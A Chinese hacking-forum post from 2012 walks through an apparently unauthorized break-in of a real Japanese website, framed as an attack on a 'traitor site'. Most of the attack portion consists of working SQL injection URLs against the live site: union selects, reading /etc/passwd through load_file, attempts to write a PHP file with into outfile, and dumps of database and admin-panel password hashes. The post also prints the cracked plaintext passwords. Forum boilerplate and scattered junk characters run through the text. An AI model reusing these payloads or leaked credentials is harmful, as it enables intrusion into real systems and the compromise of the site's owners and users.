找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 3599|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
. ?+ m; `5 i6 ?

7 K( n/ S: f) [- D% {1 B0x01. 检测 www.zuaa.jp 收集数据& @5 m$ c" i) e/ C! y# m

8 s! i) \  Q7 W7 H2 [  G+ n, u, t
whatweb
- ^! Q' {6 K! K; Y+ f: ?! O! h% h* T8 K; M! X/ M2 Z6 q
. `  a. D: N! g! R- F: D$ Z, M) ^1 m6 t
利用NMAP扫描7 I7 c  ?  m& ?
# \! {" G+ p  w6 Z. H& ?
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* x3 c! D- w( q7 Y  `0 r. n8 H, N- J0x02.找注入点8 H! A* B" U% v3 x9 E* z' T
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390) C& R# q0 j, ?7 z9 ~$ d
$ d- s* m# E; w' [( B. {3 X0 o5 P

- L" D& }! V6 f( `2 |3 r0x03.order by
3 p  N( w: G0 Q$ A( A" t; Z             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1: l, _4 z8 J8 G  Y: q  L
8 k  C+ x- S  p- H" w
order by 28报错,order by 27正常; Y$ j9 L: X  {* d) S
/ J# C0 T* f$ D" G  S, o% t& S5 q
0x04.   union手动查询
& L  p! |' v5 s4 @  f- ?http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ a. j6 t  z% N) a" A/ c添加到 27 时正常显示
& s* }& P( H, o- l  ^2 B' A! {/ ~2 X" v
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- d4 ?# E5 s* a1 m% V
9 u+ J+ A/ G' X7 T6 v
0x05. info:. [/ Z& w0 s2 d# g
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
& h# V; d4 `. A1 n+ @* f- b+ {  x- b$ ]7 L$ n$ J2 C
user:            root@localhost' U9 g! L0 d3 |. E5 Y. l5 L
database:    openpne; L  k$ K2 n2 O' k* [: J
version:      4.1.22+ m% _, ?4 p# Q$ a4 {3 n
os:             portbld-freebsd5.4
5 O+ O7 a. i: R, P
2 I) L, V! m" M: U9 a0x06. root用户; C$ [% U9 ~6 K/ h3 e$ e9 ]9 X/ T
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
. q* l  \- O7 A! v( d8 H" khttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 2 B; d3 s  W) E; `

/ \* r1 G- W! G; {通过工具转换+ f7 u+ S2 |$ s. n6 s1 `+ p
7 |$ B& G8 ^) v( J( O% }: E
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持, G# L1 ?9 H0 v8 [+ ]

$ _. ^9 R/ v7 }$ I+ A' k0x07. 利用 into outfile  z( O9 m$ a- Q- b( o
全部都失败" W: K$ B" ~) T; ]  G" e6 c
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
, p7 p8 B: ^/ t2 T3 U4 N) J4 S* {0 n, S
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php ( ?2 H0 I) k# C! N% f2 x8 V: M
) }1 G0 t2 |) n
页面显示“MDB2 Error:syntax error”
2 @; q" L2 P" k( C
) v4 H2 a/ ^6 Y( |0x08. 利用 mysql 4.1
' T2 b! k$ w' n猜常规表名,字段未果 工具 sqlmap: c4 G! V% u* |
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
, {7 t# H( H/ a" P2 d# x
- O  B8 M, t' \* q! J% x; o* u* q7 O4 E$ t9 s6 J3 M
% \' O7 B3 J% W. e# J
0x09. 查找后台
& w4 `& K" C" x利用 现有的各种 后台工具尝试都不行
  U+ `, A0 m7 f+ C1 Z2 @$ q" @) l5 J' s4 [4 m9 l
0x10.  MySL外联方法
& @* E1 W* m9 ~$ ^从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
' X& T; G) x. v6 ?4 D8 V可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user& P4 [+ u! @2 E7 z( G* f( F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
) k: a; k. Z/ f4 o) T7 m6 V
4 l; J  s8 L$ a; j/ S+ E这个可以在 www.cmd5.com 解密
' X% E% X& G# Q: {" r+ ?9 jroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20092 `( J0 S2 B) A3 Q! z/ ~
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
& D1 ?# E) _) Q0 l' Yopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???# `6 c; j8 B( z! i/ a. ?4 S+ [7 g
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???" s6 R  w" O9 v4 l  {0 r3 u% I9 A3 D
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
7 a1 J9 z( c6 p- C1 S
  M) [& j+ ]1 H* E; ]" r+ {- p. @% X$ S8 K" r$ ^) O0 T) [, @# e- Z
0x11. 网站突破
3 Q% r& h1 h& H+ x' W发现网站的源程序 openpne, google 下载 openpne 源码
" s9 l& g+ Q8 P1 K" e3 }  q) S: W9 z, g7 N6 n2 B/ d

2 {0 p5 M& p( A0 q% y0x12. 默认信息利用6 e( F. y" e6 I2 H4 x- P/ A
http://sns.zuaa.jp/?m=admin&a=page_login
0 o3 K. u$ I' g2 Y4 b) e
# L% h# d# x0 g: f! u表名 (c_admin_user) ,字段名(username,password)& w7 D5 q! R4 q  \: }# ^2 {1 O
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
, `1 N6 }6 s( ?9 P' b* V, b* ^3 g  J6 W" h/ Z
解密( {3 e* t& X5 G! m; w+ r4 C
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
4 `/ D7 n2 k5 E3 V3 Wzuaajp:c0923ec5857796a393da99905008c176,          zju1897/ c! M3 ^' r  o# O+ Y, C# s: O& ?

4 X$ h2 r: {) m3 l  r中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持! [/ z9 t7 s- S4 P% z, A
- N1 u. {1 a. ^* a2 R* y7 R8 \
0x13. 登录后台: t. s: Q/ z- L# e

+ }; K4 m) Y8 z" r7 }
4 a9 q8 I% s6 J
# }7 i1 k! `. S- `$ `/ L0x14. 小结
7 b5 ]# ?& L8 F* a6 |利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
/ X' C0 @9 q3 [. A0 T( H感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点) k3 v4 M  N! f2 ]) I6 ], q9 Z
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain+ f  X& r0 w5 o2 F9 B* \8 \& c8 T, s
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 ?' j; {  w9 x( L: A5 e5 [% l3 G3 X2 B) W& T
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
3 Q2 S; @) k% j0 s4 W5 i

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表